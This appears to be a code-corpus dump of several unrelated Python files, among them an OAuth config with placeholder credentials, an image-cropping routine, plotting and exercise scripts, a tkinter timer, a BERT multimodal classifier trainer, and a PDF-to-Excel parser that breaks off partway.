seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
"""Static configuration for the PyTeamsExporter app: Azure AD OAuth credentials,
requested Microsoft Graph scopes, and API endpoints."""
# Fill these in from your Azure app (see https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app).
CLIENT_ID = 'YOUR_CLIENT_ID'
CLIENT_SECRET = 'YOUR_CLIENT_SECRET'
# App redirect URI and allowed scopes.
REDIRECT_URI = 'http://localhost:5000/login/authorized'
# Delegated Microsoft Graph permissions requested at sign-in.
SCOPES = [
    "User.Read",
    "Chat.Read",
    "Files.Read",
    "offline_access"
]
# URLs and endpoints for authorization.
AUTHORITY_URL = 'https://login.microsoftonline.com/common'
AUTH_ENDPOINT = '/oauth2/v2.0/authorize'
TOKEN_ENDPOINT = '/oauth2/v2.0/token'
# Microsoft Graph API configuration.
RESOURCE = 'https://graph.microsoft.com/'
# NOTE: the 'beta' channel is required for the API calls we need to make.
API_VERSION = 'beta'
# Version metadata for JSON output.
EXPORT_VERSION = '0.1'
| KasumiL5x/PyTeamsExporter | app_config.py | app_config.py | py | 785 | python | en | code | 1 | github-code | 13 |
3402293306 | # import the necessary packages
from imutils import contours
from skimage import measure
import numpy as np
import argparse
import imutils
import cv2
from google.colab.patches import cv2_imshow
import PIL
import os
def cropONH(imageName):
    """Locate the optic nerve head (ONH) in a fundus image by thresholding for
    the largest bright blob, crop a fixed-size window around it from both the
    image and its ground-truth mask, and save the crops into the Testing folders.

    Parameters
    ----------
    imageName : str
        Image identifier; its first character selects the data split
        ("n"/"g" -> Training, "V" -> Validation, "T" -> Testing).
    """
    left_bias = 128   # extra margin subtracted from the top-left corner
    output_dim = 512  # nominal side length of the cropped window

    def calc_gt_bounds(msk_path):
        """Return (h1, h2, w1, w2): the first/last rows and columns of the
        inverted mask that contain both a 127 and a 0 value.
        NOTE(review): the reverse scans index gt[-i]; at i == 0 that re-checks
        row 0 instead of the last row -- confirm against the mask format.
        """
        gt = PIL.Image.open(msk_path)
        mw, mh = gt.size
        gt = 255 - np.array(gt)  # invert so the annotated regions carry the codes
        gt_T = gt.T
        for i in range(gt.shape[0]):
            if (127 in gt[i]) and (0 in gt[i]):
                h1 = i
                break
        for i in range(gt.shape[0]):
            if (127 in gt[-i]) and (0 in gt[-i]):
                h2 = mh - i
                break
        for i in range(gt_T.shape[0]):
            if (127 in gt_T[i]) and (0 in gt_T[i]):
                w1 = i
                break
        for i in range(gt_T.shape[0]):
            if (127 in gt_T[-i]) and (0 in gt_T[-i]):
                w2 = mw - i
                break
        return h1, h2, w1, w2

    # Resolve the Google Drive paths for this image's split.
    data_set = {"n": "Training", "g": "Training", "V": "Validation", "T": "Testing"}
    folderName = data_set[imageName[0]]
    folder_path = "drive/Shared drives/Capstone Summer 2020/Data/Original/" + folderName
    img_path = folder_path + "/Images/" + imageName + ".jpg"
    mask_path = folder_path + "/Masks/" + imageName + ".bmp"
    y1, y2, x1, x2 = calc_gt_bounds(mask_path)
    image = PIL.Image.open(img_path)
    im_w, im_h = image.size
    curr_threshold = starting_threshold = 250
    while True:
        # Load the image, convert it to grayscale, and denoise it.
        image = cv2.imread(img_path)
        gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
        median = cv2.medianBlur(gray, 5)
        # Threshold to reveal the brightest regions.
        thresh = cv2.threshold(median, curr_threshold, 255, cv2.THRESH_BINARY)[1]
        # Erode/dilate to remove small blobs of noise from the thresholded image.
        thresh = cv2.erode(thresh, None, iterations=2)
        thresh = cv2.dilate(thresh, None, iterations=4)
        # Connected-component analysis; keep only the single largest bright blob.
        labels = measure.label(thresh, connectivity=2, background=0)
        mask = np.zeros(thresh.shape, dtype="uint8")
        largest_blob = 0
        for label in np.unique(labels):
            if label == 0:
                continue  # background label
            labelMask = np.zeros(thresh.shape, dtype="uint8")
            labelMask[labels == label] = 255
            numPixels = cv2.countNonZero(labelMask)
            if numPixels > largest_blob:
                largest_blob = numPixels
                mask = labelMask
        # Find the contours in the mask, then sort them from left to right.
        cnts = cv2.findContours(mask.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)
        cnts = imutils.grab_contours(cnts)
        if not cnts:
            # Nothing bright enough found: relax the threshold and retry.
            curr_threshold -= 10
            continue
        print("Decreased threshold by: {}".format(starting_threshold - curr_threshold))
        cnts = contours.sort_contours(cnts)[0]
        for (i, c) in enumerate(cnts):
            (x, y, w, h) = cv2.boundingRect(c)
            center = (round(x + (w / 2)), round(y + (h / 2)))
            cv2.putText(image, "O", center, cv2.FONT_HERSHEY_SIMPLEX, 0.45, (0, 0, 255), 2)
            box_radius = output_dim // 2
            # NOTE(review): left_bias is subtracted from both x and y of the
            # top-left corner -- confirm this asymmetric window is intended.
            tl_pt = [center[0] - box_radius - left_bias, center[1] - box_radius - left_bias]
            br_pt = [center[0] + box_radius, center[1] + box_radius]
            # Shift the window right/down if the top-left corner is out of bounds.
            if tl_pt[0] < 0:
                neg = tl_pt[0] * -1
                tl_pt[0] = 0
                br_pt[0] += neg
            if tl_pt[1] < 0:
                neg = tl_pt[1] * -1
                tl_pt[1] = 0
                br_pt[1] += neg
            # Shift the window left/up if the bottom-right corner is out of bounds.
            # FIX: the original computed pos = im_w - br_pt[0] (a negative value)
            # and then did tl_pt[0] -= pos, which moved the top-left corner
            # *towards* the overflowing edge and shrank the window; the positive
            # overflow must be subtracted, mirroring the TL correction above.
            if br_pt[0] > im_w:
                overflow = br_pt[0] - im_w
                br_pt[0] = im_w
                tl_pt[0] -= overflow
            if br_pt[1] > im_h:
                overflow = br_pt[1] - im_h
                br_pt[1] = im_h
                tl_pt[1] -= overflow
            cv2.rectangle(image, tuple(tl_pt), tuple(br_pt), (255, 0, 0), 8)
            break  # only the left-most contour of the largest blob is used
        # Warn when the ground-truth bounds are not fully inside the crop window.
        if not ((x1 >= tl_pt[0]) and (x2 <= br_pt[0]) and (y1 >= tl_pt[1]) and (y2 <= br_pt[1])):
            print("-" * 50)
            print("GT Bounds aren't within Mask Bounds for the IMAGE: {}".format(imageName))
            print("-" * 50)
        print("Wid: ", br_pt[0] - tl_pt[0], "\tHei:", br_pt[1] - tl_pt[1])
        # Re-read the originals (without the debug drawings) and crop both.
        orig_image = cv2.imread(img_path)
        gt = cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
        cropped_image = orig_image[tl_pt[1]:br_pt[1], tl_pt[0]:br_pt[0]]
        cropped_gt = gt[tl_pt[1]:br_pt[1], tl_pt[0]:br_pt[0]]
        c_img_path = "drive/Shared drives/Capstone Summer 2020/Data/Testing/Images/" + imageName + ".jpg"
        c_msk_path = "drive/Shared drives/Capstone Summer 2020/Data/Testing/Masks/" + imageName + ".bmp"
        # Save the cropped image and mask.
        cv2.imwrite(c_img_path, cropped_image)
        cv2.imwrite(c_msk_path, cropped_gt)
        break
| pascuale2/Glaucoma-Identification | Dataset/crop_ONH.py | crop_ONH.py | py | 5,108 | python | en | code | 2 | github-code | 13 |
# -*- coding: utf-8 -*-
"""Plot conntrack connection counts against their sampling timestamps."""
import matplotlib.pyplot as plt
import numpy as np
from dateutil.parser import parse

# One connection count per line.
# FIX: the original left both files open (one handle was never even used) and
# plotted the raw newline-terminated strings; parse them as numbers instead.
with open('conntrack.txt', 'r') as conntrack_file:
    con = [float(linea) for linea in conntrack_file]

# One timestamp per line, e.g. "Sat Oct 8 20:00:01 CLST 2016",
# parsed into datetime objects such as 2016-10-08 20:00:01-03:00.
with open('date.txt', 'r') as date_file:
    fechas = [parse(linea) for linea in date_file]

plt.title(u"Conntrack Status")  # chart title
plt.plot(fechas, con)  # x = timestamps, y = connection counts
plt.xlabel('From Oct 8 2016 to Jan 10 2017')  # x-axis label
plt.ylabel('Connections')  # y-axis label
plt.show()
| amcabezas/grafico-conntrack-python | grafico_conntrack.py | grafico_conntrack.py | py | 692 | python | es | code | 0 | github-code | 13 |
"""Solutions to list/dictionary practice exercises."""

# ans1: a mixed-type list (ints, floats, strings, complex numbers).
a = [1, 4.9, "dhruv", 1+5j, 2, 54.88, "patel", 9+6j, 2, 8.44]

# ans2: slicing demonstrations.
lst = [1, 2.5, "Consultadd", 1+2j, 2]
print(lst[::-1])  # reversed
print(lst[::2])   # every second element
print(lst[2:])    # from index 2 onwards
print(lst[:3])    # first three elements

# ans3: sum and product of all numbers in the list.
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
lst1 = 0
lst2 = 1
for i in lst:
    lst1 += i
for i in lst:
    lst2 *= i
print("Sum of all numbers in the list:", lst1)
print("Multiplication of all numbers in the list:", lst2)

# ans4: largest and smallest elements.
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print("Largest element:", max(lst))
print("Smallest element:", min(lst))

# ans5: drop the even numbers.
lst = [1, 2, 3, 4, 5, 6, 7, 8, 9]
lst1 = [i for i in lst if i % 2 != 0]
print("New list which contains the specified numbers after removing the even numbers:", lst1)

# ans6: squares of 1..30; show the first and last five.
lst = [i*i for i in range(1, 31)]
print("First 5 elements of the list:", lst[:5])  # FIX: was lst[:4], only four elements
print("Last 5 elements of the list:", lst[-5:])  # FIX: was lst[-1:-5], an empty slice

# ans7: lst1 without its last two elements, followed by lst2.
lst1 = [1, 3, 5, 7, 9, 10]
lst2 = [2, 4, 6, 8]
# FIX: the original called .extend() on a temporary slice and printed its
# None return value; concatenation yields the intended combined list.
print(lst1[:-2] + lst2)

# ans8: merge two dictionaries.
a = {1: 10, 2: 20}
b = {3: 30, 4: 40}
c = {}
# FIX: `for k, v in [a, b]` unpacked each dict's two *keys* as (k, v),
# producing {1: 2, 3: 4}; update() copies every key/value pair instead.
for d in (a, b):
    c.update(d)
print(c)

# ans9: dictionary of n -> n**2 for 1..8.
n = 8
dictionary = {}
for i in range(1, n+1):
    dictionary[i] = i**2
print(dictionary)

# ans10: read comma-separated values and show them as a list and a tuple.
values = input("enter numbers")
l = values.split(",")
t = tuple(l)
print(l)
print(t)
| pdhruv1805/consultadd | assignment3.py | assignment3.py | py | 1,178 | python | en | code | 0 | github-code | 13 |
import time
from tkinter import *
from tkinter import messagebox

# Create the main Tk window.
root = Tk()
root.geometry("300x250")
root.title("Time Counter")

# StringVars backing the three entry fields.
hour = StringVar()
minute = StringVar()
second = StringVar()
# Default display value of 00:00:00.
hour.set(" 00")
minute.set(" 00")
second.set(" 00")

# Labels for hours, minutes, and seconds.
hour_label = Label(root, text="Hours", font=("Arial", 12))
hour_label.place(x=87, y=55)
minute_label = Label(root, text="Minutes", font=("Arial", 12))
minute_label.place(x=141, y=55)
second_label = Label(root, text="Seconds", font=("Arial", 12))
second_label.place(x=200, y=55)

# Entry widgets that take the countdown duration from the user.
hourEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=hour)
hourEntry.place(x=83, y=20)
minuteEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=minute)
minuteEntry.place(x=143, y=20)
secondEntry = Entry(root, width=3, font=("Arial", 18, ""), textvariable=second)
secondEntry.place(x=203, y=20)

def submit():
    """Validate the entries and run the countdown, refreshing the display once a second."""
    try:
        temp = int(hour.get()) * 3600 + int(minute.get()) * 60 + int(second.get())
    except ValueError:
        messagebox.showerror("Input Error", "Please input valid numbers")
        return
    while temp >= 0:
        mins, secs = divmod(temp, 60)
        hours = 0
        # FIX: was `mins > 60`, which displayed exactly one hour as 00:60:00.
        if mins >= 60:
            hours, mins = divmod(mins, 60)
        hour.set(" {:02d}".format(hours))
        minute.set(" {:02d}".format(mins))
        second.set(" {:02d}".format(secs))
        root.update()  # repaint the window while this loop blocks the mainloop
        time.sleep(1)
        # When the countdown reaches 0, a messagebox pops up with "Time's up".
        if temp == 0:
            messagebox.showinfo("Time Countdown", "Time's up")
        temp -= 1

# Button widget that starts the countdown.
btn = Button(root, text='Start Countdown', bd='5', command=submit)
btn.place(x=90, y=120)

root.mainloop()
15447884553 | #/usr/bin/python
import csv
import sys
import argparse
import torch
from torch import nn
import torch.nn.functional as F
from tqdm import tqdm
import os
import torchvision.models as models
from torch.utils.data import DataLoader, Dataset
import torchvision.transforms as transforms
import json
from PIL import Image
import numpy
from collections import defaultdict
import h5py
import numpy as np
import pickle
import pandas as pd
#BERT
import transformers
from transformers import BertModel, BertTokenizer, AdamW, get_linear_schedule_with_warmup
import warnings
warnings.filterwarnings('ignore')
# Fix the RNG seeds for reproducibility and pick the GPU when one is available.
RANDOM_SEED = 42
np.random.seed(RANDOM_SEED)
torch.manual_seed(RANDOM_SEED)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
def load_query_trans_dict(file, lang):
    '''
    Build the Query -> Translation lookup from `gold_german_query_classes.csv`:
    'en' maps each query to its English source verb, 'de' to its German verb
    translation; any other language code yields an empty dictionary.
    (src: https://github.com/spandanagella/multisense/blob/master/eval_verb_accuracy.py)
    '''
    column_by_lang = {'en': 'verb', 'de': 'verb_translation'}
    translations = dict()
    with open(file) as csvfile:
        for row in csv.DictReader(csvfile):
            query = row['query'].strip()
            if lang in column_by_lang:
                translations[query] = row[column_by_lang[lang]].strip()
    return translations
class ImageQueryDataset(Dataset):
    '''
    Dataset class for image + query + nodes_hidden_state.

    Each item pairs a precomputed image embedding (from an HDF5 file) with the
    BERT-tokenized search query (English source verb prepended) and an integer
    label for the target German verb; when `node_feat` is given, a graph-node
    hidden state is attached as well.
    '''
    def __init__(self, in_file, ref_dict, verb_map, query_dict, tokenizer, max_len, node_feat=None, node_map=None):
        """
        Args:
            in_file: HDF5 file holding the 'global_features' image embeddings.
            ref_dict: pickled dict with per-image metadata ('names', 'verbs').
            verb_map: pickled dict mapping each unique verb to an integer label.
            query_dict: CSV with the query -> source-verb lookup.
            tokenizer: BERT tokenizer used on the queries.
            max_len: tokenized sequence length (padded/truncated).
            node_feat: optional torch file of graph-node hidden states.
            node_map: pickled DataFrame mapping queries to graph ids.
        """
        super(ImageQueryDataset, self).__init__()
        self.file = h5py.File(in_file, 'r')
        self.ref_dict = pickle.load(open(ref_dict, "rb"))  # one-to-one mapping for image (file_path, file_name, verb)
        # Map each unique verb to an integer label.
        self.verb_map = pickle.load(open(verb_map, "rb"))  # verb_map is a unique dictionary determined by the training-set ref_dict
        self.labels = [self.verb_map[verb] for verb in self.ref_dict['verbs']]
        # Look-up table with query as key and source verb as value.
        self.query_trans_dict = load_query_trans_dict(query_dict, 'en')
        self.tokenizer = tokenizer  # BERT tokenizer
        self.max_len = max_len  # default 128
        # Optional node hidden states.
        if node_feat is not None:
            self.node_feat = torch.load(node_feat)
            # Mapping of retrieved top-1 nodes to graph_id.
            self.node_df = pd.read_pickle(node_map)
        else:
            self.node_feat = None

    def __getitem__(self, index):
        """Return one sample dict; includes 'node_feat' only when node features are loaded."""
        image_feat = self.file['global_features'][index]  # ResNet152 embedding
        name = self.ref_dict['names'][index]  # image name
        query = name.split("__")[0].replace("_", " ")  # image query recovered from the file name
        source_verb = self.query_trans_dict[query]  # English source verb for this query
        query_prepend = source_verb + ' ' + query  # prepend the source verb to the query
        encoding = self.tokenizer.encode_plus(
            query_prepend,
            add_special_tokens=True,
            max_length=self.max_len,
            truncation=True,
            return_token_type_ids=False,
            pad_to_max_length=True,
            return_attention_mask=True,
            return_tensors='pt',
        )
        target = self.labels[index]  # the target verb in German, mapped to an integer
        # Attach the node hidden state when available.
        if self.node_feat is not None:
            graph_id = self.node_df[self.node_df['query']==query]['graph_id'].to_numpy()[0]
            node_feat = self.node_feat[graph_id]
            return {
                'image_feat': image_feat,
                'input_ids': encoding['input_ids'].flatten(),
                'attention_mask': encoding['attention_mask'].flatten(),
                'targets': torch.tensor(target, dtype=torch.long),
                'node_feat': node_feat
            }
        else:
            return {
                'image_feat': image_feat,
                'input_ids': encoding['input_ids'].flatten(),
                'attention_mask': encoding['attention_mask'].flatten(),
                'targets': torch.tensor(target, dtype=torch.long)
            }

    def __len__(self):
        # Dataset size equals the number of stored image embeddings.
        return self.file['global_features'].shape[0]
class Multimodel(nn.Module):
    '''
    Model class for Multimodal Verb Sense Disambiguation.
    [Textual query => BERT text feature; Image features; Node hidden state] => predict translated verb

    The feature streams are concatenated (optionally after linear projection)
    and fed through zero or one hidden layers into a linear output over verbs.
    '''
    def __init__(self, n_classes, n_hidden=None, node_flag=False, nonlinearity=False, drop_prob=0, projection=False, proj_dim=100):
        """
        Args:
            n_classes: number of target (German) verb classes.
            n_hidden: hidden-layer width; None selects a single linear layer.
            node_flag: if True, a 100-dim graph-node hidden state is concatenated.
            nonlinearity: apply ReLU after the hidden layer.
            drop_prob: dropout probability applied after the hidden layer.
            projection: project image/text features to proj_dim before concatenation.
            proj_dim: output dimensionality of the projection layers.
        """
        super(Multimodel, self).__init__()
        # NOTE(review): PRE_TRAINED_MODEL_NAME is a global assigned in the
        # __main__ block -- this class is only constructible after that runs.
        self.bert = BertModel.from_pretrained(PRE_TRAINED_MODEL_NAME)
        self.drop = nn.Dropout(p=drop_prob)
        self.n_hidden = n_hidden
        self.nonlinear = nonlinearity
        self.projection = projection
        if node_flag:
            node_dim = 100 #dim of hidden states
        else:
            node_dim = 0
        ## two-layer
        if self.n_hidden is not None:
            if self.projection: #first project both img & text features to 100 dim, then concat w/ node hidden state (100-dim)
                self.proj_img = nn.Linear(2048, proj_dim)
                self.proj_txt = nn.Linear(self.bert.config.hidden_size , proj_dim)
                self.hidden = nn.Linear(2*proj_dim + node_dim, n_hidden)
            else: #one giant projection layer on concatenated features
                self.hidden = nn.Linear(self.bert.config.hidden_size + 2048 + node_dim, n_hidden)
            self.out = nn.Linear(n_hidden, n_classes) #output layer
        ## one-layer
        else:
            self.out = nn.Linear(self.bert.config.hidden_size + 2048 + node_dim, n_classes)

    def forward(self, input_ids, attention_mask, image_features, node_features):
        """Return unnormalized class logits for a batch.

        Args:
            input_ids / attention_mask: BERT-tokenized query (verb prepended).
            image_features: image embeddings (2048-dim, per the Linear above).
            node_features: graph-node hidden states, or None when unused.
        """
        outputs = self.bert(
            input_ids=input_ids,
            attention_mask=attention_mask)
        sequence_output = outputs[0]
        textual_features = sequence_output[:,1,:] #[batch_size, seq_length, hidden_dim], #index 1 corresponds to the prepended English verb embedding
        # Assemble the joint feature vector for the chosen configuration.
        if node_features is not None:
            if self.projection:
                img_projected = self.proj_img(image_features)
                txt_projected = self.proj_txt(textual_features)
                features = torch.cat([txt_projected, img_projected, node_features],dim=-1)
            else:
                features = torch.cat([textual_features, image_features, node_features],dim=-1)
        else:
            if self.projection:
                img_projected = self.proj_img(image_features)
                txt_projected = self.proj_txt(textual_features)
                features = torch.cat([txt_projected, img_projected],dim=-1)
            else:
                features = torch.cat([textual_features, image_features],dim=-1)
        # Optional hidden layer with dropout (and optional ReLU).
        if self.n_hidden is not None:
            h = self.hidden(features)
            h = self.drop(h)
            if self.nonlinear:
                h = F.relu(h)
        else:
            h = features
        return self.out(h)
def train_epoch(model, data_loader, loss_fn, optimizer, device, n_examples, node_flag=False):
    """Run one training epoch.

    Args:
        model: network called with (input_ids, attention_mask, image_features, node_features).
        data_loader: iterable of batch dicts produced by ImageQueryDataset.
        loss_fn: classification loss on (logits, targets).
        optimizer: optimizer stepping the model parameters after every batch.
        device: device the batch tensors are moved to.
        n_examples: total number of training examples (accuracy denominator).
        node_flag: when True, also feed the batch's 'node_feat' tensor.

    Returns:
        (accuracy over n_examples, mean per-batch loss).
    """
    model = model.train()
    batch_losses = []
    n_correct = 0
    for batch in data_loader:
        images = batch["image_feat"].to(device)
        ids = batch["input_ids"].to(device)
        masks = batch["attention_mask"].to(device)
        labels = batch["targets"].to(device)
        nodes = batch["node_feat"].to(device) if node_flag else None
        logits = model(input_ids=ids, attention_mask=masks,
                       image_features=images, node_features=nodes)
        _, predicted = torch.max(logits, dim=1)
        batch_loss = loss_fn(logits, labels)
        n_correct += torch.sum(predicted == labels)
        batch_losses.append(batch_loss.item())
        batch_loss.backward()
        optimizer.step()
        optimizer.zero_grad()
    return n_correct.double() / n_examples, np.mean(batch_losses)
def eval_model(model, data_loader, loss_fn, device, n_examples, node_flag=False):
    """Evaluate the model without gradient tracking.

    Args:
        model: network called with (input_ids, attention_mask, image_features, node_features).
        data_loader: iterable of batch dicts produced by ImageQueryDataset.
        loss_fn: classification loss on (logits, targets).
        device: device the batch tensors are moved to.
        n_examples: total number of evaluation examples (accuracy denominator).
        node_flag: when True, also feed the batch's 'node_feat' tensor.

    Returns:
        (accuracy over n_examples, mean per-batch loss).
    """
    model = model.eval()
    batch_losses = []
    n_correct = 0
    with torch.no_grad():
        for batch in data_loader:
            images = batch["image_feat"].to(device)
            ids = batch["input_ids"].to(device)
            masks = batch["attention_mask"].to(device)
            labels = batch["targets"].to(device)
            nodes = batch["node_feat"].to(device) if node_flag else None
            logits = model(input_ids=ids, attention_mask=masks,
                           image_features=images, node_features=nodes)
            _, predicted = torch.max(logits, dim=1)
            batch_losses.append(loss_fn(logits, labels).item())
            n_correct += torch.sum(predicted == labels)
    return n_correct.double() / n_examples, np.mean(batch_losses)
if __name__=="__main__":
p = argparse.ArgumentParser()
p.add_argument('--batch_size', type=int, default=16)
p.add_argument('--epochs', type=int, default=10)
p.add_argument('--lr', type=float, default=0.0001)
p.add_argument('--decay', type=float, default=0)
p.add_argument('--node', action='store_true', default=False)
p.add_argument('--node_file', type=str, default="/content/drive/My Drive/graph/nyu_multimodal_kb/NER/graph_emb_node.t")
p.add_argument('--num_layer', type=int, default=2)
p.add_argument('--nonlinear', action='store_true', default=False)
p.add_argument('--dropout', type=float, default=0)
p.add_argument('--projection', action='store_true', default=False)
p.add_argument('--model_file', type=str, default="./multisense_model_weights/plustest/baseline_lr0.0005_2.bin")
p.add_argument('--subset', type=float, default=1) #determine whether subset training samples for low-resource regime
p.add_argument('--proj_dim', type=int, default=100) #specify the projection dimension (raw feature -> projected feature)
p.add_argument('--hidden_dim', type=int, default=128) #specify the projection dimension (concatenated projected features -> hidden layer)
args = p.parse_args()
##BERT params
PRE_TRAINED_MODEL_NAME = 'bert-large-cased'
tokenizer = BertTokenizer.from_pretrained(PRE_TRAINED_MODEL_NAME)
##create data loaders
if args.node:
train_dataset = ImageQueryDataset(in_file='features_per_image_train_german.h5',ref_dict='train_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
valid_dataset = ImageQueryDataset(in_file='features_per_image_val_german.h5',ref_dict='val_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
test_dataset = ImageQueryDataset(in_file='features_per_image_test_german.h5',ref_dict='test_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128,
node_feat=args.node_file, node_map="query_nodes.pkl")
else:
train_dataset = ImageQueryDataset(in_file='features_per_image_train_german.h5',ref_dict='train_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
valid_dataset = ImageQueryDataset(in_file='features_per_image_val_german.h5',ref_dict='val_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
test_dataset = ImageQueryDataset(in_file='features_per_image_test_german.h5',ref_dict='test_german.pkl',
verb_map = "verb_map.pkl", query_dict='gold_german_query_classes.csv',
tokenizer=tokenizer, max_len=128)
#create training data loaders
if args.subset == 1:
train_loader = torch.utils.data.DataLoader(train_dataset, batch_size=args.batch_size,num_workers = 1, shuffle=True)
else: #subset training set for low-resource scenario
subset_idx = list(range(0, len(train_dataset), int(1/args.subset)))
trainsub = torch.utils.data.Subset(train_dataset, subset_idx)
train_loader = torch.utils.data.DataLoader(trainsub, batch_size=args.batch_size,num_workers = 1, shuffle=True)
valid_loader = torch.utils.data.DataLoader(valid_dataset, batch_size=args.batch_size,num_workers = 1)
test_loader = torch.utils.data.DataLoader(test_dataset, batch_size=args.batch_size,num_workers = 1)
##model
num_verbs = len(train_dataset.verb_map)
print(num_verbs)
if args.num_layer == 2:
model = Multimodel(num_verbs, args.hidden_dim, args.node, args.nonlinear, args.dropout, args.projection, args.proj_dim)
else:
model = Multimodel(num_verbs, None, args.node, False, 0)
for param in model.bert.parameters():
param.requires_grad = False #freeze BERT
#pytorch_total_params = sum(p.numel() for p in model.parameters() if p.requires_grad)
#print(pytorch_total_params)
model = model.to(device)
optimizer = torch.optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.decay)
loss_fn = nn.CrossEntropyLoss().to(device)
##training
history = defaultdict(list)
best_accuracy = 0
for epoch in range(args.epochs):
if epoch % 1 == 0:
print(f'Epoch {epoch + 1}/{args.epochs}')
print('-' * 10)
train_acc, train_loss = train_epoch(
model,
train_loader,
loss_fn,
optimizer,
device,
int(len(train_dataset)*args.subset),
args.node
)
print(f'Train loss {train_loss} accuracy {train_acc}')
val_acc, val_loss = eval_model(
model,
valid_loader,
loss_fn,
device,
len(valid_dataset),
args.node
)
print(f'Val loss {val_loss} accuracy {val_acc}')
print()
history['train_acc'].append(train_acc)
history['train_loss'].append(train_loss)
history['val_acc'].append(val_acc)
history['val_loss'].append(val_loss)
if val_acc > best_accuracy:
if args.node:
model_path = './multisense_model_weights/plustest/'+ args.node_file.split('/')[-1][:-2] +'.bin'
torch.save(model.state_dict(), model_path)
else:
model_path = './multisense_model_weights/plustest/baseline_lr' + str(args.lr) + '_' + str(args.num_layer) + '.bin'
torch.save(model.state_dict(), model_path)
best_accuracy = val_acc
#eval on test
model.load_state_dict(torch.load(model_path))
test_acc, test_loss = eval_model(
model,
test_loader,
loss_fn,
device,
len(test_dataset),
args.node
)
print(f"test acc: {test_acc}")
print(f"test loss: {test_loss}")
#save history
f_file=open("./multisense_model_weights/model_results.txt", "a+")
f_file.write(f"\n")
if args.node:
f_file.write("Setting: " + args.node_file.split('/')[-1][:-2])
else:
f_file.write(f"Setting: Baseline with lr {args.lr}" )
f_file.write(f"\n")
f_file.write(f"Result (Best Validation): {best_accuracy}")
f_file.write(f"\n")
f_file.write(f"Result (Best Test): {test_acc}")
f_file.close()
| iacercalixto/visualsem-kg | multisense/multi_train.py | multi_train.py | py | 16,396 | python | en | code | 2 | github-code | 13 |
# A list of single-entry dicts; collect the distinct values in first-seen order.
given_list = [{'first':'1'},{'second':'2'},{'third':'1'},{'four':'5'},{'five':'5'},{'six':'9'},{'seven':'7'}]
req_list = []
# Iterate the dicts directly (no manual while/index bookkeeping) and keep
# each value only the first time it appears, preserving input order.
for entry in given_list:
    for value in entry.values():
        if value not in req_list:
            req_list.append(value)
print(req_list)
# how to improve this code?
# improved :)
# I did it... | gmswati/Dictionary_Meraki | Q7.py | Q7.py | py | 363 | python | en | code | 0 | github-code | 13 |
14386235805 | #
# @lc app=leetcode.cn id=144 lang=python3
#
# [144] 二叉树的前序遍历
#
from collections import deque
from typing import List
class TreeNode:
    """Minimal binary-tree node (local copy so the script runs outside LeetCode)."""
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right
# @lc code=start
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    def preorderTraversal(self, root: TreeNode) -> List[int]:
        """Iterative preorder (root, left, right) traversal using an explicit stack."""
        values = []
        pending = [root]
        while pending:
            node = pending.pop()
            if node is None:
                continue  # placeholder for a missing child (or an empty tree)
            values.append(node.val)
            # Push right before left so the left subtree is visited first.
            pending.append(node.right)
            pending.append(node.left)
        return values
# @lc code=end
# Quick manual check: the preorder of this tree is [5, 4, 2, 1, 6].
tree = TreeNode(5, TreeNode(4, TreeNode(2), TreeNode(1)), TreeNode(6))
r = Solution().preorderTraversal(tree)
print(r)
| largomst/leetcode-problem-solution | 144.二叉树的前序遍历.2.py | 144.二叉树的前序遍历.2.py | py | 1,078 | python | en | code | 0 | github-code | 13 |
32986673794 | import PyPDF2
from openpyxl import Workbook
import os
# Workbooks that collect, respectively, the trade rows and the tax rows.
workbook_stock = Workbook()
workbook_tax = Workbook()
# Select the active sheet of each workbook.
sheet_stock = workbook_stock.active
sheet_tax = workbook_tax.active
# Header rows for the two sheets.
stock_feature = ["Date", "Order Number", "Trade Number", "Security/Contract Description", "Buy/Sell", "Qty"]
tax_feature = ['Date', 'STT/CT', 'Brokerage', 'Transaction and Clearing Charges', 'Stamp Duty', 'Sebi Fee/RM', 'Taxable value of supply', 'Cgst@9%', 'Sgst@9%', 'Net Amount']
sheet_tax.append(tax_feature)
sheet_stock.append(stock_feature)
# Folder holding the broker contract-note PDFs to process.
folder_path = r'C:\Users\Dharavat hanumanth\Desktop\saiteja_app\stocks'
for filename in os.listdir(folder_path):
    if filename.endswith('.pdf'):  # Check if the file is a PDF file
        file_path = os.path.join(folder_path, filename)  # Get the full file path
        with open(file_path, 'rb') as pdf_file:
            pdf_reader = PyPDF2.PdfReader(pdf_file)
            page = pdf_reader.pages[0]  # only the first page is parsed
            text = page.extract_text()
            lines = text.split('\n')
            # NOTE(review): the slice positions below assume a fixed contract-note
            # layout (taxes in the 18th..10th lines from the end, the date on the
            # 9th-from-last line, trades from line 57 onwards) -- confirm against
            # the broker's PDF format before reuse.
            taxes_all = lines[-18:-9]
            date = lines[-9].split()[2]
